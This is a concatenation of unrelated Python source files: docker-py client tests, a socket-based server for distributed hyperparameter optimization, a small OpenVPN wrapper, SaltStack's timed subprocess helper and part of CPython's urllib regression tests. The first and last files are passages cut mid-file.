context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
def test_build_remote_with_registry_auth(self):
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
def test_build_container_with_named_dockerfile(self):
self.client.build('.', dockerfile='nameddockerfile')
def test_build_container_with_container_limits(self):
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
###################
# VOLUMES TESTS #
###################
@base.requires_api_version('1.21')
def test_list_volumes(self):
volumes = self.client.volumes()
self.assertIn('Volumes', volumes)
self.assertEqual(len(volumes['Volumes']), 2)
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], url_prefix + 'volumes')
@base.requires_api_version('1.21')
def test_create_volume(self):
name = 'perfectcherryblossom'
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertEqual(args[1]['data'], {
'Name': name, 'Driver': None, 'DriverOpts': None
})
@base.requires_api_version('1.21')
def test_create_volume_with_driver(self):
name = 'perfectcherryblossom'
driver_name = 'sshfs'
self.client.create_volume(name, driver=driver_name)
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertIn('Driver', args[1]['data'])
self.assertEqual(args[1]['data']['Driver'], driver_name)
@base.requires_api_version('1.21')
def test_create_volume_invalid_opts_type(self):
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts='hello=world'
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=['hello=world']
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=''
)
@base.requires_api_version('1.21')
def test_inspect_volume(self):
name = 'perfectcherryblossom'
result = self.client.inspect_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
@base.requires_api_version('1.21')
def test_remove_volume(self):
name = 'perfectcherryblossom'
result = self.client.remove_volume(name)
self.assertIsNone(result)
args = fake_request.call_args
self.assertEqual(args[0][0], 'DELETE')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
#####################
# NETWORK TESTS #
#####################
def test_create_network(self):
network_data = {
"id": 'abc12345',
"warning": "",
}
network_response = response(status_code=200, content=network_data)
post = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.post', post):
result = self.client.create_network('foo')
self.assertEqual(result, network_data)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/create')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo"})
self.client.create_network('foo', 'bridge')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo", "driver": "bridge"})
def test_remove_network(self):
network_id = 'abc12345'
delete = mock.Mock(return_value=response(status_code=200))
with mock.patch('docker.Client.delete', delete):
self.client.remove_network(network_id)
args = delete.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
def test_inspect_network(self):
network_id = 'abc12345'
network_name = 'foo'
network_data = {
six.u('name'): network_name,
six.u('id'): network_id,
six.u('driver'): 'bridge',
six.u('containers'): {},
}
network_response = response(status_code=200, content=network_data)
get = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.get', get):
result = self.client.inspect_network(network_id)
self.assertEqual(result, network_data)
args = get.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
def test_connect_container_to_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.connect_container_to_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/connect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
def test_disconnect_container_from_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.disconnect_container_from_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/disconnect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(docker.auth.INDEX_NAME in cfg)
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
f.write(json.dumps(config))
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(registry in cfg)
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
exclude = [
'*.py',
'!b.py',
'!a.go',
'foo',
'Dockerfile*',
'.dockerignore',
]
expected_names = set([
'Dockerfile',
'.dockerignore',
'a.go',
'b.py',
'bar',
'bar/a.py',
])
base = make_tree(dirs, files)
self.addCleanup(shutil.rmtree, base)
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
assert sorted(tar.getnames()) == sorted(expected_names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, self.client.create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
|
server.py
|
import os, sys, time
from typing import Dict, List, Union
import json
import logging
import socket
from _thread import start_new_thread
from threading import Lock
from multiprocessing import Pipe, Process, Queue, Manager
from multiprocessing.connection import Connection
# from queue import SimpleQueue
from dopt import Optimizer
from dopt.utils import process_commands_in_parallel
class Server:
def __init__(self,
optimizer: Optimizer,
config: Dict,
# initial_candidates: Union[None, List[Dict]] = None,
logging_level = logging.ERROR
) -> None:
"""Need docs on the config"""
self.optimizer = optimizer
self.process_list = []
self.config = config
self.trainers = Manager().dict()
self.trainer_id = 0
self.trainer_queue = Queue()
self.bad_candidate_queue = Queue()
# self.initial_candidates = initial_candidates \
# if isinstance(initial_candidates, list) else []
self.logging_level = logging_level
self.server_logger = self.init_log(stdout_level=self.logging_level)
# Locks for multiprocess or multithreaded access to resource
self.lock_trainers = Lock()
self.lock_trainer_queue = Lock()
self.lock_optimizer_conn = Lock()
self.lock_server_logger = Lock()
self.lock_bad_candidate_queue = Lock()
def run(self):
"""Starts 3 main Processes: One for the Optimizer, one for
starting trainers, one for connecting with trainers."""
# Runs the Optimizer
self.optimizer_conn, cconn = Pipe()
optimizer_process = Process(target=self.optimizer.run,
args=(cconn, self.server_logger, self.lock_server_logger))
optimizer_process.daemon = True
self.process_list.append(optimizer_process)
# Establish server connections, waits for trainers to connect
listen_trainers_process = Process(target=self.listen_trainers, args=())
listen_trainers_process.daemon = True
self.process_list.append(listen_trainers_process)
# Startup trainers on target remote machines
startup_process = Process(target=self.startup_trainers, args=())
startup_process.daemon = False # This process spawns children processes
self.process_list.append(startup_process)
# Start all processes
for p in self.process_list:
p.start()
while True:
with self.lock_server_logger:
with self.lock_trainers:
self.server_logger.debug(f"Number of Trainers running: {len(self.trainers)}")
with self.lock_trainer_queue:
self.server_logger.debug(f"Number of Trainers in the Queue: {self.trainer_queue.qsize()}")
if not self.trainer_queue.empty():
with self.lock_server_logger:
self.server_logger.debug("A Trainer is ready")
# Prefer re-dispatching a candidate left over from a crashed Trainer before asking the Optimizer for a new one
candidate = None
with self.lock_optimizer_conn:
with self.lock_bad_candidate_queue:
if not self.bad_candidate_queue.empty():
candidate = self._dequeue_bad_candidate()
elif self.optimizer_conn.poll(None): # There's a candidate available
message = self.optimizer_conn.recv()
message = json.loads(message)
candidate = message["candidate"]
if candidate is not None:
connection, address, is_active, pending_candidate, trainer_id = self._dequeue_trainer()
self._send_candidate_to_trainer(candidate, connection, address)
with self.lock_trainers:
self.trainers[trainer_id] = [*self.trainers[trainer_id][:3], candidate]
with self.lock_trainers:
with self.lock_server_logger:
self.server_logger.debug(f"Trainers running: {json.dumps({trainer_id: self.trainers[trainer_id][1:] for trainer_id in list(self.trainers)})}, assigning {candidate} to {trainer_id}.")
else:
pass
if not optimizer_process.is_alive():
with self.lock_server_logger:
self.server_logger.debug("Optimizer stopped. Killing all processes.")
break
time.sleep(1)
self.terminate()
def terminate(self):
"""Kill all Processes"""
for p in self.process_list:
p.kill()
def _remove_pending_candidate(self, pending_candidate):
"""Tells the Optimizer to drop candidate off pending list"""
with self.lock_server_logger:
self.server_logger.warning(f"Removing candidate: {pending_candidate}")
with self.lock_optimizer_conn:
self.optimizer_conn.send(Optimizer.HEADER_REMOVE_CANDIDATE + \
json.dumps(pending_candidate)+'\n')
def _dequeue_bad_candidate(self):
# The caller in run() already holds self.lock_bad_candidate_queue; the
# threading.Lock is not reentrant, so re-acquiring it here would deadlock.
return self.bad_candidate_queue.get() # Block until a candidate is available
def _dequeue_trainer(self):
"""Dequeues one trainer from the queue, return trainer info."""
with self.lock_trainer_queue:
trainer_id = self.trainer_queue.get() # Block until found one
with self.lock_trainers:
if trainer_id not in self.trainers:
return self._dequeue_trainer()
pending_candidate = None
if len(self.trainers[trainer_id]) == 3:
connection, address, is_active = self.trainers[trainer_id]
elif len(self.trainers[trainer_id]) == 4:
connection, address, is_active, pending_candidate = self.trainers[trainer_id]
else:
raise Exception(f"self.trainers contains wrong things: {self.trainers[trainer_id]}")
if is_active == 0 and pending_candidate:
# Remove corrupted Trainer & dequeue again
self._remove_pending_candidate(pending_candidate)
self.trainers.pop(trainer_id)
return self._dequeue_trainer()
return connection, address, is_active, pending_candidate, trainer_id
def _send_candidate_to_trainer(self, candidate, connection, address):
"""Send a candidate safely to a Trainer on the queue"""
try:
connection.sendall(str.encode(
json.dumps({"candidate": candidate}) + "\n"
))
with self.lock_server_logger:
self.server_logger.debug(json.dumps({'candidate_sent':candidate, 'address':address}))
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception(f"Problem with address: {address}")
def startup_trainers(self):
"""Runs on another Process. SSH into each machine in the list,
and start the Trainers with commands specified."""
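# Each entry passed to process_commands_in_parallel() has the shape
# {"host": <ssh target from config["computer_list"]>,
#  "command": <startup command string from config["commands"]>}.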
commands = []
for host_cat in self.config["computer_list"]:
for host in self.config["computer_list"][host_cat]:
commands.append({
"host": host,
"command": self.config["commands"][host_cat]
})
with self.lock_server_logger:
self.server_logger.debug("Starting trainers..")
process_commands_in_parallel(commands)
def listen_trainers(self):
"""Runs on another Process. Spawns threads to handle communication
with Trainers."""
server = socket.socket()
host = '0.0.0.0'
port = self.config["server"]["port"]
try:
server.bind((host, port))
except socket.error as e:
with self.lock_server_logger:
self.server_logger.exception("Connection Error")
with self.lock_server_logger:
self.server_logger.debug('Waiting for a Connection..')
server.listen(5)
while True:
client, address = server.accept()
with self.lock_server_logger:
self.server_logger.debug('Connected to: ' + address[0] + ':' + str(address[1]))
start_new_thread(self.threaded_client_handling, (client, address,))
def threaded_client_handling(self, connection, address):
"""A thread handling the Trainers. Continually communicate
with the Trainers to gather real-time info on the Trainers."""
with self.lock_trainers:
# Quick fix for multiple Trainer instances running on same machine
if len(self.trainers) > 0:
for trainer_id in self.trainers.keys():
if address[0] == self.trainers[trainer_id][1][0]:
return
self.trainer_id += 1
self.trainers[self.trainer_id] = [connection, address, 1] # 1 means active
trainer_id = self.trainer_id
while True:
# Receive message from trainers
try:
responses = connection.recv(10000)
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception("Can't receive response")
break
# If trainer exits
if not responses:
break
# Handle message received
reply = self._handle_client_response(responses, trainer_id, address)
# Reply back to trainers
try:
connection.sendall(str.encode(reply+'\n'))
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception("Can't send reply")
break
# Delay response
time.sleep(0.5)
connection.close()
with self.lock_server_logger:
self.server_logger.warning(f"Closed connection with {address}")
with self.lock_trainers:
# Remove corrupted Trainer & dequeue again
if len(self.trainers[trainer_id]) == 4:
_, _, status, pending_candidate = self.trainers[trainer_id]
if status == 2:
# Candidate crashes when evaluated (twice in a row)
self._remove_pending_candidate(pending_candidate)
with self.lock_server_logger:
self.server_logger.error("Trainer crashes while evaluating candidate: " + \
f"{json.dumps(pending_candidate)}")
elif status == 1:
# Trainer crashed: Save candidate to try on a different Trainer
with self.lock_bad_candidate_queue:
self.bad_candidate_queue.put(pending_candidate)
elif len(self.trainers[trainer_id]) == 3:
with self.lock_server_logger:
self.server_logger.warning(f"Trainers running: {json.dumps({trainer_id: self.trainers[trainer_id][1:] for trainer_id in self.trainers.keys()})}, Current {trainer_id} has {self.trainers[trainer_id]}.")
else:
raise Exception(f"self.trainers contains wrong things: {self.trainers[trainer_id]}")
self.trainers.pop(trainer_id)
# self.trainers[trainer_id][3] = 0 # Trainer not active anymore
def _handle_client_response(self, responses, trainer_id, address):
"""Handles the response from the Trainers
:param response: Client response contains a dictionary with
following keys:
"gpu_info": Information on the machine GPU, CPU, etc.
"logging": Using print() on Trainer side will be channeled
into this to show up on Server side.
"observation": Only appears when an observation is made,
contains a dictionary with keys: "candidate", "result",
"info".
:param trainer_id: ID of a Trainer
:return: A reply to the Trainer
"""
responses = responses.decode("utf8")
logger = self.init_log(address=address, stdout_level=self.logging_level)
for response in responses.split("\n")[:-1]:
with self.lock_server_logger:
self.server_logger.debug(f"Loading response: {response}")
response = json.loads(response)
if "observation" in response:
with self.lock_optimizer_conn:
self.optimizer_conn.send(json.dumps(response["observation"])+'\n')
with self.lock_trainer_queue:
self.trainer_queue.put(trainer_id)
with self.lock_trainers:
self.trainers[trainer_id][2] = 1
with self.lock_server_logger:
self.server_logger.debug(json.dumps(response['observation']))
if "error" in response:
with self.lock_server_logger:
self.server_logger.error(f'{response["error"]}') #
if "gpu_info" in response:
with self.lock_server_logger:
self.server_logger.debug(json.dumps(response['gpu_info']))
# with self.lock_trainers:
# self.trainers[trainer_id][2] = response["gpu_info"] # For now
if "stack_info" in response:
# Log
stringReceived = logging.makeLogRecord(response)
logger.handle(stringReceived)
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
return json.dumps({"message": "candidate_sent"}) # Just an empty message
def init_log(self, address=None, stdout_level=logging.DEBUG):
logger = logging.getLogger("")
logger.setLevel(logging.DEBUG)
# create file handler that logs debug and higher level messages
filename = "logs_" + self.optimizer.filename.split(".")[0] + \
f"_{'client' if address else 'server'}.txt"
fh = logging.FileHandler(filename)
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(stdout_level)
# create formatter and add it to the handlers
name = json.dumps(address) if address else "server"
formatter = logging.Formatter(f'[{name} - %(asctime)s - %(levelname)s] %(message)s')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
# add the handlers to logger
logger.addHandler(ch)
logger.addHandler(fh)
return logger
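# --- Usage sketch (not part of the original module) ---------------------------
# The config keys below are the ones Server actually reads (server.port,
# computer_list, commands); the host names and command strings are hypothetical.
# example_config = {
#     "server": {"port": 15555},
#     "computer_list": {"gpu_hosts": ["user@machine1"]},
#     "commands": {"gpu_hosts": "python trainer.py"},
# }
# Server(optimizer, example_config, logging_level=logging.DEBUG).run()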
|
vpn.py
|
import os
import sys
import colorama
import threading
import webbrowser
import subprocess
import gh_md_to_html
import tkinter.messagebox
cwd = os.getcwd()
colorama.init(autoreset=True)
def run(command: str, *args, **kwargs):
return subprocess.run(command, shell=True) or True
def run_threaded(command: str, threaded=False):
try:
print(colorama.Fore.MAGENTA + command)
thread = threading.Thread(target=run, args=(command,))
thread.start()
return thread
except Exception as e:
tkinter.messagebox.showerror(title='Error!', message=e)
return False
def convert_and_show(doc: str):
html_code = gh_md_to_html.main(f'{cwd}/docs/{doc}.md', website_root=cwd, enable_css_saving=False)
html_path = f'{cwd}/docs/generated/{doc}.html'
open(html_path, 'w').write(html_code)
webbrowser.open(html_path)
def show_shop():
convert_and_show('shop')
def show_tutorial():
webbrowser.open(cwd + '/docs/shop.md')
def show_log():
webbrowser.open(cwd + '/logs/connection.log')  # assumed log path, matching connect()'s redirect
def vpns():
return [f for f in os.listdir('vpns') if f.endswith('.ovpn')]
def prompt_sudo():
ret = 0
if os.geteuid() != 0:
ret = run('sudo -v -p "[LixVPN] sudo-password for %u:"')
return ret
def start():
if not ('--no-sudo' in sys.argv or '--ns' in sys.argv):
prompt_sudo()
print(colorama.Fore.BLUE + 'LixVPN started.')
def close():
run('pkill -f "gui.py"')
run('sudo killall openvpn')
run('pkill -f "cli.py"')
def connect(to: str):
run(f'sudo openvpn --config vpns/{to} > logs/connection.log')
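# Usage sketch (assumption, not in the original file): a typical session would
# prompt for sudo, pick a .ovpn profile from vpns(), and connect to it.
# start()
# profiles = vpns()
# if profiles:
#     connect(profiles[0])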
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''For running command line executables with a timeout'''
from __future__ import absolute_import
import subprocess
import threading
import salt.exceptions
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = self.stdin.replace('\\n', '\n')
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except TypeError:
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.is_alive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.is_alive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
str(self.timeout),
)
)
return self.process.returncode
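# Usage sketch (assumption, not part of the salt module): run a command with a
# 5-second ceiling and capture its output via communicate().
# proc = TimedProc(['echo', 'hello'], timeout=5,
#                  stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# retcode = proc.run()   # raises salt.exceptions.TimedProcTimeoutError on timeout
# output = proc.stdout   # populated because with_communicate defaults to True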
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
